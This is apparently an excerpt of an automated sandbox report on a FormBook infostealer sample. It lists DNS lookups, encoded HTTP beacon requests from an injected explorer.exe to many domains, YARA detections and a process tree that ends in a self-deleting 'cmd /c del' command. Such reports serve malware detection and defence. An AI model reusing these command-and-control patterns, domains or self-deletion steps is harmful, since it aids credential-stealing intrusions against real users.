                                                                  Apr 8, 2021 11:07:13.456182003 CEST5071353192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:07:13.498326063 CEST53507138.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:07:15.255613089 CEST5613253192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:07:15.282083035 CEST53561328.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:07:18.552443981 CEST5898753192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:07:18.801412106 CEST53589878.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:07:19.747328997 CEST5657953192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:07:19.760103941 CEST53565798.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:07:22.796905994 CEST6063353192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:07:22.815566063 CEST53606338.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:07:24.441622972 CEST6129253192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:07:24.470289946 CEST53612928.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:07:29.488107920 CEST6361953192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:07:29.514267921 CEST53636198.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:07:34.569546938 CEST6493853192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:07:34.848860025 CEST53649388.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:07:40.396531105 CEST6194653192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:07:40.471549034 CEST53619468.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:07:55.034406900 CEST6491053192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:07:55.046662092 CEST53649108.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:07:57.276434898 CEST5212353192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:07:57.309338093 CEST53521238.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:08:03.825078964 CEST5613053192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:08:04.001548052 CEST53561308.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:08:06.507342100 CEST5633853192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:08:06.543065071 CEST53563388.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:08:11.941447973 CEST5942053192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:08:11.968172073 CEST53594208.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:08:17.192883968 CEST5878453192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:08:17.215616941 CEST53587848.8.8.8192.168.2.3

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                  Apr 8, 2021 11:06:47.333250046 CEST192.168.2.38.8.8.80x7449Standard query (0)www.rainbowsdepot.comA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:06:52.563858986 CEST192.168.2.38.8.8.80xc92bStandard query (0)www.mywinnersworld.comA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:06:58.004676104 CEST192.168.2.38.8.8.80x2eb4Standard query (0)www.gracieleesgiftsandmore.comA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:07:03.231091022 CEST192.168.2.38.8.8.80xca4aStandard query (0)www.ezmodafinil.comA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:07:13.456182003 CEST192.168.2.38.8.8.80x5abeStandard query (0)www.orgoneartist.comA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:07:18.552443981 CEST192.168.2.38.8.8.80x3dceStandard query (0)www.tonton-koubou.comA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:07:24.441622972 CEST192.168.2.38.8.8.80x76dbStandard query (0)www.hatikuturkila.comA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:07:29.488107920 CEST192.168.2.38.8.8.80x3e06Standard query (0)www.th0rgramm.comA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:07:34.569546938 CEST192.168.2.38.8.8.80xe4dcStandard query (0)www.phillhutt.comA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:07:40.396531105 CEST192.168.2.38.8.8.80x10f9Standard query (0)www.formula-kuhni.comA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:08:03.825078964 CEST192.168.2.38.8.8.80x755dStandard query (0)www.formula-kuhni.comA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:08:06.507342100 CEST192.168.2.38.8.8.80x5434Standard query (0)www.thelitigatorsbookclub.comA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:08:11.941447973 CEST192.168.2.38.8.8.80x80Standard query (0)www.apettelp.clubA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:08:17.192883968 CEST192.168.2.38.8.8.80xf08cStandard query (0)www.jjwheelerphotography.comA (IP address)IN (0x0001)

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                  Apr 8, 2021 11:06:47.551381111 CEST8.8.8.8192.168.2.30x7449Server failure (2)www.rainbowsdepot.comnonenoneA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:06:52.765392065 CEST8.8.8.8192.168.2.30xc92bNo error (0)www.mywinnersworld.com67.205.188.68A (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:06:58.033833981 CEST8.8.8.8192.168.2.30x2eb4No error (0)www.gracieleesgiftsandmore.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                  Apr 8, 2021 11:06:58.033833981 CEST8.8.8.8192.168.2.30x2eb4No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:07:03.430695057 CEST8.8.8.8192.168.2.30xca4aServer failure (2)www.ezmodafinil.comnonenoneA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:07:13.498326063 CEST8.8.8.8192.168.2.30x5abeName error (3)www.orgoneartist.comnonenoneA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:07:18.801412106 CEST8.8.8.8192.168.2.30x3dceNo error (0)www.tonton-koubou.com163.44.185.226A (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:07:24.470289946 CEST8.8.8.8192.168.2.30x76dbName error (3)www.hatikuturkila.comnonenoneA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:07:29.514267921 CEST8.8.8.8192.168.2.30x3e06Name error (3)www.th0rgramm.comnonenoneA (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:07:34.848860025 CEST8.8.8.8192.168.2.30xe4dcNo error (0)www.phillhutt.com103.97.19.74A (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:07:40.471549034 CEST8.8.8.8192.168.2.30x10f9No error (0)www.formula-kuhni.com91.236.136.12A (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:08:04.001548052 CEST8.8.8.8192.168.2.30x755dNo error (0)www.formula-kuhni.com91.236.136.12A (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:08:06.543065071 CEST8.8.8.8192.168.2.30x5434No error (0)www.thelitigatorsbookclub.comthelitigatorsbookclub.comCNAME (Canonical name)IN (0x0001)
                                                                  Apr 8, 2021 11:08:06.543065071 CEST8.8.8.8192.168.2.30x5434No error (0)thelitigatorsbookclub.com184.168.131.241A (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:08:11.968172073 CEST8.8.8.8192.168.2.30x80No error (0)www.apettelp.clubapettelp.clubCNAME (Canonical name)IN (0x0001)
                                                                  Apr 8, 2021 11:08:11.968172073 CEST8.8.8.8192.168.2.30x80No error (0)apettelp.club95.215.210.10A (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:08:17.215616941 CEST8.8.8.8192.168.2.30xf08cNo error (0)www.jjwheelerphotography.comjjwheelerphotography.comCNAME (Canonical name)IN (0x0001)
                                                                  Apr 8, 2021 11:08:17.215616941 CEST8.8.8.8192.168.2.30xf08cNo error (0)jjwheelerphotography.com192.0.78.24A (IP address)IN (0x0001)
                                                                  Apr 8, 2021 11:08:17.215616941 CEST8.8.8.8192.168.2.30xf08cNo error (0)jjwheelerphotography.com192.0.78.25A (IP address)IN (0x0001)

                                                                  HTTP Request Dependency Graph

                                                                  • www.mywinnersworld.com
                                                                  • www.gracieleesgiftsandmore.com
                                                                  • www.tonton-koubou.com
                                                                  • www.phillhutt.com

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  0192.168.2.34972367.205.188.6880C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 8, 2021 11:06:52.880374908 CEST1174OUTGET /hx3a/?tZUT=0fll8pJq7ZAUibPF4kinhno6RtSSoQWPS25LacVc9zIksnHvjqyKkUnVN9tOTAaZP4N+&9r98J=FbY8OBD HTTP/1.1
                                                                  Host: www.mywinnersworld.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Apr 8, 2021 11:06:52.985718966 CEST1175INHTTP/1.1 301 Moved Permanently
                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                  Date: Thu, 08 Apr 2021 09:06:52 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 194
                                                                  Connection: close
                                                                  Location: https://www.mywinnersworld.com/hx3a/?tZUT=0fll8pJq7ZAUibPF4kinhno6RtSSoQWPS25LacVc9zIksnHvjqyKkUnVN9tOTAaZP4N+&9r98J=FbY8OBD
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  1192.168.2.34972423.227.38.7480C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 8, 2021 11:06:58.048885107 CEST1176OUTGET /hx3a/?tZUT=3J4IwxDxyQGM57lngVTovpY0RYYybvKdXCCorOYcpgj/2IXBVenraHtymYKqlnAzAiYz&9r98J=FbY8OBD HTTP/1.1
                                                                  Host: www.gracieleesgiftsandmore.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Apr 8, 2021 11:06:58.188266039 CEST1177INHTTP/1.1 403 Forbidden
                                                                  Date: Thu, 08 Apr 2021 09:06:58 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  X-Sorting-Hat-PodId: 154
                                                                  X-Sorting-Hat-ShopId: 44749029531
                                                                  X-Dc: gcp-us-east1
                                                                  X-Request-ID: 2df77edf-6e63-4f5a-9d73-69255bdc7913
                                                                  Set-Cookie: _shopify_fs=2021-04-08T09%3A06%3A58Z; Expires=Fri, 08-Apr-22 09:06:58 GMT; Domain=gracieleesgiftsandmore.com; Path=/; SameSite=Lax
                                                                  X-Content-Type-Options: nosniff
                                                                  X-Permitted-Cross-Domain-Policies: none
                                                                  X-XSS-Protection: 1; mode=block
                                                                  X-Download-Options: noopen
                                                                  CF-Cache-Status: DYNAMIC
                                                                  cf-request-id: 095255278a0000233d520e6000000001
                                                                  Server: cloudflare
                                                                  CF-RAY: 63ca57b8dc76233d-ZRH
                                                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                  Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39
                                                                  Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  2192.168.2.349727163.44.185.22680C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 8, 2021 11:07:19.043236971 CEST1221OUTGET /hx3a/?tZUT=vULSFbXUfWqfH/UQKANXmh//LRVD9fF+bm7wgJ2FfsCiVE70xyhWGRMHpTR01i4U7VcQ&9r98J=FbY8OBD HTTP/1.1
                                                                  Host: www.tonton-koubou.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Apr 8, 2021 11:07:19.424396992 CEST1222INHTTP/1.1 301 Moved Permanently
                                                                  Date: Thu, 08 Apr 2021 09:07:19 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: close
                                                                  Server: Apache
                                                                  X-Powered-By: PHP/7.4.12
                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                  X-Redirect-By: WordPress
                                                                  Location: http://tonton-koubou.com/hx3a/?tZUT=vULSFbXUfWqfH/UQKANXmh//LRVD9fF+bm7wgJ2FfsCiVE70xyhWGRMHpTR01i4U7VcQ&9r98J=FbY8OBD
                                                                  X-Cache: MISS


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  3192.168.2.349735103.97.19.7480C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 8, 2021 11:07:35.113116980 CEST4899OUTGET /hx3a/?tZUT=etiEYBoPDxOhXHdNW+toGoO48BEbVYBhZG7o21xT+1ckFZjGUMv71muAk6m7YJWGV3TF&9r98J=FbY8OBD HTTP/1.1
                                                                  Host: www.phillhutt.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Apr 8, 2021 11:07:35.378310919 CEST4899INHTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Thu, 08 Apr 2021 09:07:34 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1.0


                                                                  Code Manipulations

                                                                  Statistics

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  Analysis Process: AQJEKNHnWK.exe PID: 1724 Parent PID: 5632

                                                                  General

                                                                  Start time:11:06:00
                                                                  Start date:08/04/2021
                                                                  Path:C:\Users\user\Desktop\AQJEKNHnWK.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\AQJEKNHnWK.exe'
                                                                  Imagebase:0x400000
                                                                  File size:371388 bytes
                                                                  MD5 hash:5D8702803555FF684424EBD13EDA9F47
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  Analysis Process: AQJEKNHnWK.exe PID: 4772 Parent PID: 1724

                                                                  General

                                                                  Start time:11:06:01
                                                                  Start date:08/04/2021
                                                                  Path:C:\Users\user\Desktop\AQJEKNHnWK.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\AQJEKNHnWK.exe'
                                                                  Imagebase:0x400000
                                                                  File size:371388 bytes
                                                                  MD5 hash:5D8702803555FF684424EBD13EDA9F47
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.256189783.0000000000A00000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.256189783.0000000000A00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.256189783.0000000000A00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.256046021.00000000005E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.256046021.00000000005E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.256046021.00000000005E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  Analysis Process: explorer.exe PID: 3388 Parent PID: 4772

                                                                  General

                                                                  Start time:11:06:07
                                                                  Start date:08/04/2021
                                                                  Path:C:\Windows\explorer.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:
                                                                  Imagebase:0x7ff714890000
                                                                  File size:3933184 bytes
                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Analysis Process: explorer.exe PID: 1156 Parent PID: 3388

                                                                  General

                                                                  Start time:11:06:22
                                                                  Start date:08/04/2021
                                                                  Path:C:\Windows\SysWOW64\explorer.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                  Imagebase:0x8c0000
                                                                  File size:3611360 bytes
                                                                  MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.468337581.0000000000840000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.468337581.0000000000840000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.468337581.0000000000840000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.468235656.0000000000810000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.468235656.0000000000810000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.468235656.0000000000810000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:high

                                                                  Analysis Process: cmd.exe PID: 5560 Parent PID: 1156

                                                                  General

                                                                  Start time:11:06:26
                                                                  Start date:08/04/2021
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:/c del 'C:\Users\user\Desktop\AQJEKNHnWK.exe'
                                                                  Imagebase:0x11c0000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Analysis Process: conhost.exe PID: 4228 Parent PID: 5560

                                                                  General

                                                                  Start time:11:06:27
                                                                  Start date:08/04/2021
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6b2800000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Disassembly

                                                                  Code Analysis

                                                                  Reset < >